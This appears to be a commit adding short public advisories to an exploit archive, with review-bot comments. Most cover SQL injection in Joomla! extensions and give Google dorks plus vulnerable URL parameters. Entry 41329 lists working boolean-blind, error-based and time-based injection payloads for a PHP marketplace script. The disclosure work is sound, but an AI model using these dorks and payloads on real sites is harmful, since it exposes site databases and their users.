# Exploit Title: Joomla! Component Soccer Bet 4.1.5 - 'userid' Parameter SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_soccerbet
|
||||
# Date: 12.02.2017
|
||||
# Vendor Homepage: http://www.jomsoccerbet.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/sports-a-games/tips-a-betts/soccer-bet/
|
||||
# Demo: http://demo.jomsoccerbet.com/
|
||||
# Version: 4.1.5
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_soccerbet&view=userbethistory&userid=[SQL]
|
||||
# # # # #
|
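Review bot: This file is added with the executable bit set (the file header shows "Executable file"), although it is a 17-line text advisory made up entirely of comment lines with nothing to execute. Suggest committing it as a regular file (mode 100644); the same applies to the other new .txt files in this commit that show the same marker.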
60
platforms/php/webapps/41329.txt
Executable file
|
@ -0,0 +1,60 @@
|
|||
# Exploit Title : PHP Marketplace Script - Multiple SQL Injection Vulnerabilities
|
||||
# Author : Yunus YILDIRIM (Th3GundY)
|
||||
# Team : CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
|
||||
# Website : http://www.yunus.ninja
|
||||
# Contact : yunusyildirim@protonmail.com
|
||||
|
||||
# Vendor Homepage : http://www.ecommercemix.com/
|
||||
# Software Link : http://ecommercemix.com/php-marketplace-script/
|
||||
# Vuln. Version : 3.0
|
||||
# Demo : http://pleasureriver.com
|
||||
|
||||
|
||||
# # # # DETAILS # # # #
|
||||
|
||||
SQL Injections :
|
||||
|
||||
# 1
|
||||
http://localhost/shopby/all?q=gundy
|
||||
Parameter: q (GET)
|
||||
Type: boolean-based blind
|
||||
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
|
||||
Payload: q=LIEQ") OR NOT 5305=5305#
|
||||
|
||||
Type: error-based
|
||||
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
Payload: q=LIEQ") AND (SELECT 7200 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(7200=7200,1))),0x7176766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("SRxl"="SRxl
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 OR time-based blind (comment)
|
||||
Payload: q=LIEQ") OR SLEEP(5)#
|
||||
|
||||
# 2
|
||||
http://localhost/shopby/all?p=31
|
||||
Parameter: p (GET)
|
||||
Type: boolean-based blind
|
||||
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
|
||||
Payload: p=31") OR NOT 6681=6681#
|
||||
|
||||
Type: error-based
|
||||
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
Payload: p=31") AND (SELECT 4760 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(4760=4760,1))),0x7176766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("eFds"="eFds
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind
|
||||
Payload: p=31") AND SLEEP(5) AND ("kxQU"="kxQU
|
||||
|
||||
# 3
|
||||
http://localhost/shopby/all?c=Turkey
|
||||
Parameter: c (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: c=Turkey' AND 9145=9145 AND 'tvKB'='tvKB
|
||||
|
||||
Type: error-based
|
||||
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
Payload: c=Turkey' AND (SELECT 5928 FROM(SELECT COUNT(*),CONCAT(0x7176767071,(SELECT (ELT(5928=5928,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'APFD'='APFD
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind
|
||||
Payload: c=Turkey' AND SLEEP(5) AND 'rmia'='rmia
|
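Review bot: The header states "Vuln. Version : 3.0" and the title line reads "Multiple SQL Injection Vulnerabilities" (three parameters are listed: q, p and c), but the files.csv row for 41329 reads "PHP Marketplace Script - SQL Injection" with no version. Suggest carrying the version into the index description, as the other rows added in this commit do where a version is known, so the entry can be matched against an installed release.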
17
platforms/php/webapps/41330.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Classify Ads 1.2 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jeclassifyads
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/je-classify-ads/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.2
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jeclassifyads&view=item_detail&pro_id=[SQL]
|
||||
# # # # #
|
17
platforms/php/webapps/41331.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Gallery v1.3 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jegallery
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/je-gallery/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.3
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jegallery&view=photo_detail&photo_id=[SQL]
|
||||
# # # # #
|
17
platforms/php/webapps/41332.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Directory Ads 1.7 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jedirectory
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/je-directory/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.7
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jedirectory&view=item_detail&ditemid=[SQL]
|
||||
# # # # #
|
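Review bot: The product name in the title, "JE Directory Ads 1.7", does not match the rest of the header: the Software Buy link ends in je-directory and the URL uses option=com_jedirectory. Confirm the name against the listing and, if the component is JE Directory, drop "Ads" so the entry is not filed under a product that does not exist.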
17
platforms/php/webapps/41333.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE QuoteForm - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jequoteform
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: http://www.joomlaextension.biz/demo/index.php?option=com_jequoteform
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jequoteform&view=form&Itemid=[SQL]
|
||||
# # # # #
|
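Review bot: "Version: N/A" together with a Software Buy line that points at the vendor demo (index.php?option=com_jequoteform) leaves no way to tell which releases are affected. Record the version string of the build that was tested, or state explicitly that only the demo instance was tested, so administrators can decide whether their install is in scope.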
18
platforms/php/webapps/41334.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Property Finder 1.6.3 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jepropertyfinder
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/je-property-finder/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.6.3
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jepropertyfinder&view=section_detail&sf_id=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_jepropertyfinder&view=userprofile&userId=[SQL]
|
||||
# # # # #
|
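Review bot: The two URL lines name different views and parameters (sf_id on section_detail, userId on userprofile), but the entry does not say whether these are two independent queries or whether the userprofile view requires a logged-in session. List each parameter with its view and its authentication requirement so a fix can be verified per view.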
18
platforms/php/webapps/41335.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Tour 2.0 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jetour
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/je-tour/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 2.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jetour&view=package_detail&pid=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_jetour&view=package&cid=[SQL]
|
||||
# # # # #
|
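Review bot: "Tested on: Win7 x64, Kali Linux x64" describes the tester's workstations, not the server that ran com_jetour. For the pid and cid findings, add the Joomla!, PHP and database versions of the test install, since those are what determine whether a given site reproduces the issue.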
18
platforms/php/webapps/41336.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Video Rate 1.0 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jevideorate
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/je-video-rate/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jevideorate&view=video&cat_id=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_jevideorate&view=video_detail&id=[SQL]
|
||||
# # # # #
|
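Review bot: The "SQL Injection/Exploit" section consists only of the two URLs with a [SQL] placeholder for cat_id and id, with no statement of the observed behaviour or the data exposed. Add one sentence on impact (for example whether database errors are returned to the client) so the entry can be rated for severity without retesting.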
17
platforms/php/webapps/41337.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE auction 1.6 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jeauction
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/e-commerce/auction/je-auction/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.6
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jeauction&view=event_detail&eid=[SQL]
|
||||
# # # # #
|
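Review bot: The title spells the product "JE auction" with a lower-case "a", while every other field follows the vendor's "JE" plus capitalised name pattern and the listing slug is je-auction. Capitalise it as "JE Auction" so title-based searches and deduplication treat it consistently.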
17
platforms/php/webapps/41338.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Auto 1.5 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jeauto
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/je-auto/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.5
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jeauto&view=item_detail&d_itemid=[SQL]
|
||||
# # # # #
|
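Review bot: The header has no line recording whether the vendor was notified or whether a fixed release exists for the d_itemid issue in 1.5. Add a disclosure or fix-status line, even if it only says "no vendor response", so readers know whether upgrading is an option or whether the component has to be disabled or filtered.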
18
platforms/php/webapps/41339.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Awd Song 1.8 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jeawdsong
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/je-awd-song/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.8
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jeawdsong&view=song_detail&id=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_jeawdsong&view=song_detail&id=1&contest_id=[SQL]
|
||||
# # # # #
|
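Review bot: The second URL pins id=1 and moves the placeholder to contest_id, which implies two separate parameters on view=song_detail, but the text never says so. State that id and contest_id are both affected and whether contest_id is only evaluated when id is a valid record, so both code paths get checked when the component is patched.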
17
platforms/php/webapps/41340.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Hbooking 1.9.9 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_hbooking
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/hbooking/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.9.9
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_hbooking&view=roomlisting&temp=hotel&h_id=[SQL]
|
||||
# # # # #
|
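Review bot: The URL carries temp=hotel next to the affected h_id parameter, and the entry does not say whether that value is required to reach the vulnerable query on view=roomlisting. Document it either way, because a virtual patch or WAF rule scoped to temp=hotel would miss the issue if other temp values reach the same code.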
18
platforms/php/webapps/41341.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Quiz 2.3 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jequizmanagement
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/je-quiz-component/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 2.3
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jequizmanagement&view=question&eid=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_jequizmanagement&view=question_detail&Itemid=[SQL]
|
||||
# # # # #
|
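Review bot: The second URL names Itemid as the affected parameter on view=question_detail, but Itemid is Joomla!'s own menu-item request variable and appears on most front-end URLs. Say explicitly that the component reads Itemid itself and uses it in its query, otherwise readers may take this for a core issue; also note that the title says "JE Quiz" while the option is com_jequizmanagement.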
17
platforms/php/webapps/41342.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Grid Folio - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jegridfolio
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: http://www.joomlaextension.biz/demo/index.php?option=com_jegridfolio
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jegridfolio&view=category_detail&id=[SQL]
|
||||
# # # # #
|
17
platforms/php/webapps/41343.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE K2 Multiple Form Story v1.3 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jek2storymultipleform
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: http://www.joomlaextensions.co.in/index.php?option=com_jeshop&view=category_detail&id=76&Itemid=112
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jek2storymultipleform&view=jesubmit&Itemid=[SQL]
|
||||
# # # # #
|
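Review bot: The title claims "v1.3" but the Version field says "N/A", so the header contradicts itself on the affected release. Make the two agree, and explain why the Software Buy link is on joomlaextensions.co.in while the Vendor Homepage is joomlaextension.biz, since readers will use these lines to identify the package they have installed.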
17
platforms/php/webapps/41344.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Form Creator v1.8 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jeformcr
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/je-form-creator/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.8
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jeformcr&view=form&Itemid=[SQL]
|
||||
# # # # #
|
17
platforms/php/webapps/41345.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Portfolio Creator v1.2 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jeportfolio
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/portfolio/je-portfolio/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.2
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jeportfolio&view=item_detail&d_itemid=[SQL]
|
||||
# # # # #
|
17
platforms/php/webapps/41346.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Ticket System v1.2 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jeticket
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/je-ticket-system/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.2
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jeticket&view=assign_detail&cid[0]=[SQL]
|
||||
# # # # #
|
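Review bot: The affected parameter on the URL line is written as cid[0], one element of an array, and the entry does not say whether only index 0 or every element of cid reaches the query on view=assign_detail. Clarify this, because the remediation is to cast each element of the array to an integer, and a fix that only handles the first element would leave the rest exposed.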
19
platforms/php/webapps/41347.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Messanger - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jemessenger
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: http://www.joomlaextension.biz/demo/index.php?option=com_jemessenger
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jemessenger&view=box_detail&folder=Inbox&task=edit&Itemid=1496&cid[0]=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_jemessenger&view=box_detail&folder=Outbox&task=edit&Itemid=1496&cid[0]=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_jemessenger&view=box_detail&folder=Trash&task=edit&Itemid=1496&cid[0]=[SQL]
|
||||
# # # # #
|
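Review bot: The title spells the product "JE Messanger" while the dork, the Software Buy link and all three URLs use com_jemessenger. Correct the spelling so the entry is searchable. The three URL lines differ only in the folder value (Inbox, Outbox, Trash) and all hard-code Itemid=1496, which looks specific to one site; replace it with a placeholder and state once that cid[0] is affected for every folder.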